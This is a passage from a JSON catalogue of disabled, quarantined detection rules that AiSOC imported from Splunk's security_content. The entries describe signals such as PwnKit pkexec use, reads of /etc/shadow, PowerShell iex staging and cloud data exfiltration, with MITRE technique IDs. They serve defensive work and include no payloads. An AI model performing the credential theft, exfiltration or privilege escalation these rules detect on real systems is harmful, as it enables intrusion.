privileges, compromising system integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/net-profiler-uac-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0252ca80-e30d-11eb-8aa3-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/net_profiler_uac_bypass.yml" } }, { "id": "splunk-security-content-026f5f4e-e99f-4155-9e63-911ba587300b", "type": "detection", "name": "Windows Defender ASR Block Events", "description": "This detection searches for Windows Defender ASR block events. ASR is a feature of Windows Defender Exploit Guard that prevents actions and apps that are typically used by exploit-seeking malware to infect machines. ASR rules are applied to processes and applications. When a process or application attempts to perform an action that is blocked by an ASR rule, an event is generated. This detection searches for ASR block events that are generated when a process or application attempts to perform an action that is blocked by an ASR rule. Typically, these will be enabled in block most after auditing and tuning the ASR rules themselves. Set to TTP once tuned.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1566.001", "T1566.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-defender-asr-block-events.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "026f5f4e-e99f-4155-9e63-911ba587300b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_defender_asr_block_events.yml" } }, { "id": "splunk-security-content-0270455b-1385-4579-9ac5-e77046c508ae", "type": "detection", "name": "Windows Proxy Via Registry", "description": "The following analytic detects the modification of registry keys related to the Windows Proxy settings via netsh.exe. It leverages data from the Endpoint.Registry data model, focusing on changes to the registry path \"*\\\\System\\\\CurrentControlSet\\\\Services\\\\PortProxy\\\\v4tov4\\\\tcp*\". This activity is significant because netsh.exe can be used to establish a persistent proxy, potentially allowing an attacker to execute a helper DLL whenever netsh.exe runs. If confirmed malicious, this could enable the attacker to maintain persistence, manipulate network configurations, and potentially exfiltrate data or further compromise the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1090.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-proxy-via-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0270455b-1385-4579-9ac5-e77046c508ae", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_proxy_via_registry.yml" } }, { "id": "splunk-security-content-029d6fe4-a5fe-43af-827e-c78c50e81d81", "type": "detection", "name": "Zeek x509 Certificate with Punycode", "description": "The following analytic detects the presence of punycode within x509 certificates using Zeek x509 logs. It identifies punycode in the subject alternative name email and other fields by searching for the \"xn--\" prefix. This activity is significant as punycode can be used in phishing attacks or to bypass domain filters, posing a security risk. If confirmed malicious, attackers could use these certificates to impersonate legitimate domains, potentially leading to unauthorized access or data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1573" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/zeek-x509-certificate-with-punycode.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "029d6fe4-a5fe-43af-827e-c78c50e81d81", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/zeek_x509_certificate_with_punycode.yml" } }, { "id": "splunk-security-content-02c1d8e9-044c-401f-906c-cc95445af8bd", "type": "detection", "name": "PowerShell Environment Variable Execution", "description": "The following analytic detects the execution of PowerShell scripts that combine environment variable access (`$env:` or `[Environment]::SetEnvironmentVariable`) with `Invoke-Expression` or its alias `iex` to dynamically construct and run code at runtime. This technique is commonly used by adversaries to stage and execute payloads by embedding commands or encoded content inside environment variables, then evaluating them on the fly \u2014 effectively hiding the true execution intent from static inspection. Detection is based on PowerShell Script Block Logging (Event ID 4104), which captures the de-obfuscated script block before it executes. Triggering this analytic indicates a potential attempt to execute environment-variable-stored code, a behavior observed in malware loaders and stagers, including those associated with the VIP Keylogger campaign.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-environment-variable-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "02c1d8e9-044c-401f-906c-cc95445af8bd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_environment_variable_execution.yml" } }, { "id": "splunk-security-content-02c6cfc2-ae66-4735-bfc7-6291da834cbf", "type": "detection", "name": "File with Samsam Extension", "description": "The following analytic detects file writes with extensions indicative of a SamSam ransomware attack.\nIt leverages file-system activity data to identify file names ending in .stubbin, .berkshire, .satoshi, .sophos, or .keyxml.\nThis activity is significant because SamSam ransomware is highly destructive, leading to file encryption and ransom demands.\nIf confirmed malicious, the impact includes significant financial losses, operational disruptions, and reputational damage.\nImmediate actions should include isolating affected systems, restoring files from backups, and investigating the attack source to prevent further incidents.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/file-with-samsam-extension.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "02c6cfc2-ae66-4735-bfc7-6291da834cbf", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/file_with_samsam_extension.yml" } }, { "id": "splunk-security-content-03b2b286-fa86-4ec9-b1a1-ec19d314bdf7", "type": "detection", "name": "Linux Docker Shell Execution", "description": "This detection identifies shell execution activity associated with Docker containers on Linux systems.\nSpecifically, it monitors for interactive or non-interactive shell processes (e.g., `/bin/bash`, `/bin/sh`, `/bin/zsh`) launched via Docker commands such as `docker exec`, or through container entrypoint overrides.\nShell execution inside a container may indicate administrative troubleshooting activity.\nHowever, it can also represent post-exploitation behavior, where an attacker gains access to a container and spawns a shell to execute arbitrary commands, establish persistence, or pivot to the host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.013" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-docker-shell-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "03b2b286-fa86-4ec9-b1a1-ec19d314bdf7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_docker_shell_execution.yml" } }, { "id": "splunk-security-content-03cdd68a-34fb-11ec-9bd3-acde48001122", "type": "detection", "name": "Gsuite suspicious calendar invite", "description": "The following analytic detects suspicious calendar invites sent via GSuite, potentially indicating compromised accounts or malicious internal activity. It leverages GSuite calendar logs, focusing on events where a high volume of invites (over 100) is sent within a 5-minute window. This behavior is significant as it may involve the distribution of malicious links or attachments, posing a security risk. If confirmed malicious, this activity could lead to widespread phishing attacks, unauthorized access, or malware distribution within the organization.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/gsuite-suspicious-calendar-invite.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "03cdd68a-34fb-11ec-9bd3-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/gsuite_suspicious_calendar_invite.yml" } }, { "id": "splunk-security-content-03e22c1c-8086-11ec-ac2e-acde48001122", "type": "detection", "name": "Linux pkexec Privilege Escalation", "description": "The following analytic detects the execution of `pkexec` without any command-line arguments. This behavior leverages data from Endpoint Detection and Response (EDR) agents, focusing on process telemetry. The significance lies in the fact that this pattern is associated with the exploitation of CVE-2021-4034 (PwnKit), a critical vulnerability in Polkit's pkexec component. If confirmed malicious, this activity could allow an attacker to gain full root privileges on the affected Linux system, leading to complete system compromise and potential unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-pkexec-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "03e22c1c-8086-11ec-ac2e-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_pkexec_privilege_escalation.yml" } }, { "id": "splunk-security-content-04023928-0381-4935-82cb-03372b2ef644", "type": "detection", "name": "Windows ScManager Security Descriptor Tampering Via Sc.EXE", "description": "The following analytic detects changes in the ScManager service security descriptor settings. It leverages data from Endpoint Detection and Response (EDR) agents, specifically searching for any process execution involving the \"sc.exe\" binary with the \"sdset\" flag targeting the \"scmanager\" service. If confirmed malicious, this could allow an attacker to escalate their privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-scmanager-security-descriptor-tampering-via-sc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "04023928-0381-4935-82cb-03372b2ef644", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_scmanager_security_descriptor_tampering_via_sc_exe.yml" } }, { "id": "splunk-security-content-0418e72f-e710-4867-b656-0688e1523e09", "type": "detection", "name": "Windows Impair Defense Disable Win Defender Scan On Update", "description": "The following analytic detects modifications to the Windows registry that disable the Windows Defender Scan On Update feature. It leverages data from the Endpoint.Registry datamodel, specifically looking for changes to the \"DisableScanOnUpdate\" registry setting with a value of \"0x00000001\". This activity is significant because disabling automatic scans can leave systems vulnerable to malware and other threats. If confirmed malicious, this action could allow attackers to bypass Windows Defender, facilitating further compromise and persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-disable-win-defender-scan-on-update.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0418e72f-e710-4867-b656-0688e1523e09", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_disable_win_defender_scan_on_update.yml" } }, { "id": "splunk-security-content-0419cb7a-57ea-467b-974f-77c303dfe2a3", "type": "detection", "name": "Linux Auditd Possible Access To Credential Files", "description": "The following analytic detects attempts to access or dump the contents of /etc/passwd and /etc/shadow files on Linux systems. It leverages data from Linux Auditd, focusing on processes like 'cat', 'nano', 'vim', and 'vi' accessing these files. This activity is significant as it may indicate credential dumping, a technique used by adversaries to gain persistence or escalate privileges. If confirmed malicious, privileges. If confirmed malicious, attackers could obtain hashed passwords for offline cracking, leading to unauthorized access and potential system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-possible-access-to-credential-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0419cb7a-57ea-467b-974f-77c303dfe2a3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_possible_access_to_credential_files.yml" } }, { "id": "splunk-security-content-04207f8a-e08d-4ee6-be26-1e0c4488b04a", "type": "detection", "name": "PowerShell Start or Stop Service", "description": "The following analytic identifies the use of PowerShell's Start-Service or Stop-Service cmdlets on an endpoint. It leverages PowerShell Script Block Logging to detect these commands. This activity is significant because attackers can manipulate services to disable or stop critical functions, causing system instability or disrupting business operations. If confirmed malicious, this behavior could allow attackers to disable security services, evade detection, or disrupt essential services, leading to potential system downtime and compromised security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-start-or-stop-service.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "04207f8a-e08d-4ee6-be26-1e0c4488b04a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_start_or_stop_service.yml" } }, { "id": "splunk-security-content-042a3d32-8318-4763-9679-09db2644a8f2", "type": "detection", "name": "Kubernetes AWS detect suspicious kubectl calls", "description": "The following analytic detects anonymous and unauthenticated requests to a Kubernetes cluster. It identifies this behavior by monitoring API calls from users who have not provided any token or password in their request, using data from `kube_audit` logs. This activity is significant for a SOC as it indicates a severe misconfiguration, allowing unfettered access to the cluster with no traceability. If confirmed malicious, an attacker could gain access to sensitive data or control over the cluster, posing a substantial security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-aws-detect-suspicious-kubectl-calls.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "042a3d32-8318-4763-9679-09db2644a8f2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_aws_detect_suspicious_kubectl_calls.yml" } }, { "id": "splunk-security-content-04430b4e-5ca8-4e88-98b5-d6bcf54f8393", "type": "detection", "name": "HTTP Scripting Tool User Agent", "description": "This Splunk query analyzes web access logs to identify and categorize non-browser user agents, detecting various types of security tools, scripting languages, automation frameworks, and suspicious patterns. This activity can signify malicious actors attempting to interact with web endpoints in non-standard ways.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/http-scripting-tool-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "04430b4e-5ca8-4e88-98b5-d6bcf54f8393", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/http_scripting_tool_user_agent.yml" } }, { "id": "splunk-security-content-04455dd3-ced7-480f-b8e6-5469b99e98e2", "type": "detection", "name": "AWS Exfiltration via Batch Service", "description": "The following analytic identifies the creation of AWS Batch jobs that could potentially abuse the AWS Bucket Replication feature on S3 buckets. It leverages AWS CloudTrail logs to detect the `JobCreated` event, analyzing job details and their status. This activity is significant because attackers can exploit this feature to exfiltrate data by creating malicious batch jobs. If confirmed malicious, this could lead to unauthorized data transfer between S3 buckets, resulting in data breaches and loss of sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1119" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-exfiltration-via-batch-service.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "04455dd3-ced7-480f-b8e6-5469b99e98e2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_exfiltration_via_batch_service.yml" } }, { "id": "splunk-security-content-0470c8e7-dd8d-420f-8302-073e8a2b66f0", "type": "detection", "name": "Windows Executable Masquerading as Benign File Types", "description": "The following analytic detects the presence of executable files masquerading as benign file types on Windows systems. Adversaries employ this technique to evade defenses and trick users into executing malicious code by renaming executables with extensions commonly associated with documents, images, or other non-executable formats (e.g., .pdf, .jpg, .doc, .png).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-executable-masquerading-as-benign-file-types.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0470c8e7-dd8d-420f-8302-073e8a2b66f0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_executable_masquerading_as_benign_file_types.yml" } }, { "id": "splunk-security-content-0488e814-eb81-42c3-9f1f-b2244973e3a3", "type": "detection", "name": "Azure AD New MFA Method Registered", "description": "The following analytic detects the registration of a new Multi-Factor Authentication (MFA) method for a user account in Azure Active Directory. It leverages Azure AD audit logs to identify changes in MFA configurations. This activity is significant because adding a new MFA method can indicate an attacker's attempt to maintain persistence on a compromised account. If confirmed malicious, the attacker could bypass existing security measures, solidify their access, and potentially escalate privileges, access sensitive data, or make unauthorized changes. Immediate verification and remediation are required to secure the affected account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-new-mfa-method-registered.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0488e814-eb81-42c3-9f1f-b2244973e3a3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_new_mfa_method_registered.yml" } }, { "id": "splunk-security-content-0562ad4b-fdaa-4882-b12f-7b8e0034cd72", "type": "detection", "name": "Windows Odbcconf Hunting", "description": "The following analytic identifies the execution of Odbcconf.exe within the environment. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events where the process name is Odbcconf.exe. This activity is significant because Odbcconf.exe can be used by attackers to execute arbitrary commands or load malicious DLLs, potentially leading to code execution or persistence. If confirmed malicious, this behavior could allow an attacker to maintain access to the system, execute further malicious activities, or escalate privileges, posing a significant threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-odbcconf-hunting.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0562ad4b-fdaa-4882-b12f-7b8e0034cd72", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_odbcconf_hunting.yml" } }, { "id": "splunk-security-content-05c4b09f-ea28-4c7c-a7aa-a246f665c8a2", "type": "detection", "name": "AWS Exfiltration via DataSync Task", "description": "The following analytic detects the creation of an AWS DataSync task, which could indicate potential data exfiltration. It leverages AWS CloudTrail logs to identify the `CreateTask` event from the DataSync service. This activity is significant because attackers can misuse DataSync to transfer sensitive data from a private AWS location to a public one, leading to data compromise. If confirmed malicious, this could result in unauthorized access to sensitive information, causing severe data breaches and compliance violations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1119" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-exfiltration-via-datasync-task.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "05c4b09f-ea28-4c7c-a7aa-a246f665c8a2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_exfiltration_via_datasync_task.yml" } }, { "id": "splunk-security-content-064cd09f-1ff4-4823-97e0-45c2f5b087ec", "type": "detection", "name": "Windows Modify Registry MaxConnectionPerServer", "description": "The following analytic identifies a suspicious modification of the Windows registry setting for max connections per server. It detects changes to specific registry paths using data from the Endpoint.Registry datamodel. This activity is significant because altering this setting can be exploited by attackers to increase the number of concurrent connections to a remote server, potentially facilitating DDoS attacks or enabling more effective lateral movement within a compromised network. If confirmed malicious, this could lead to network disruption or further compromise of additional systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-maxconnectionperserver.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "064cd09f-1ff4-4823-97e0-45c2f5b087ec", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_maxconnectionperserver.yml" } }, { "id": "splunk-security-content-065f2701-b7ea-42f5-9ec4-fbc2261165f9", "type": "detection", "name": "Windows AD add Self to Group", "description": "This analytic detects instances where a user adds themselves to an Active Directory (AD) group. This activity is a common indicator of privilege escalation, where a user attempts to gain unauthorized access to higher privileges or sensitive resources. By monitoring AD logs, this detection identifies such suspicious behavior, which could be part of a larger attack strategy aimed at compromising critical systems and data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-add-self-to-group.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "065f2701-b7ea-42f5-9ec4-fbc2261165f9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_add_self_to_group.yml" } }, { "id": "splunk-security-content-0661c2de-93de-11ec-9833-acde48001122", "type": "detection", "name": "Windows WMI Process Call Create", "description": "The following analytic detects the execution of WMI command lines used to create or execute processes. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line events that include specific keywords like \"process,\" \"call,\" and \"create.\" This activity is significant because adversaries often use WMI to execute malicious payloads on local or remote hosts, potentially bypassing traditional security controls. If confirmed malicious, this behavior could allow attackers to execute arbitrary code, escalate privileges, or maintain persistence within the environment, posing a severe threat to organizational security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-wmi-process-call-create.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0661c2de-93de-11ec-9833-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_wmi_process_call_create.yml" } }, { "id": "splunk-security-content-06ade821-f6fa-40d0-80af-15bc1d45b3ba", "type": "detection", "name": "Windows Exfiltration Over C2 Via Invoke RestMethod", "description": "The following analytic detects potential data exfiltration using PowerShell's Invoke-RestMethod. It leverages PowerShell Script Block Logging to identify scripts that attempt to upload files via HTTP POST requests. This activity is significant as it may indicate an attacker is exfiltrating sensitive data, such as desktop screenshots or files, to an external command and control (C2) server. If confirmed malicious, this could lead to data breaches, loss of sensitive information, and further compromise of the affected systems. Immediate investigation is recommended to determine the intent and scope of the activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1041" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-exfiltration-over-c2-via-invoke-restmethod.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "06ade821-f6fa-40d0-80af-15bc1d45b3ba", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_exfiltration_over_c2_via_invoke_restmethod.yml" } }, { "id": "splunk-security-content-06b23921-bfe2-4576-89dd-616f06e129da", "type": "detection", "name": "O365 Exfiltration via File Download", "description": "The following analytic detects when an excessive number of files are downloaded from o365 by the same user over a short period of time. O365 may bundle these files together as a ZIP file, however each file will have it's own download event. This behavior may indicate an attacker staging data for exfiltration or an insider threat removing organizational data. Additional attention should be taken with any Azure Guest (#EXT#) accounts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567", "T1530" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-exfiltration-via-file-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "06b23921-bfe2-4576-89dd-616f06e129da", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_exfiltration_via_file_download.yml" } }, { "id": "splunk-security-content-06b8ec9a-d3b5-4882-8f16-04b4d10f5eab", "type": "detection", "name": "Azure AD User Consent Blocked for Risky Application", "description": "The following analytic detects instances where Azure AD has blocked a user's attempt to grant consent to a risky or potentially malicious application. This detection 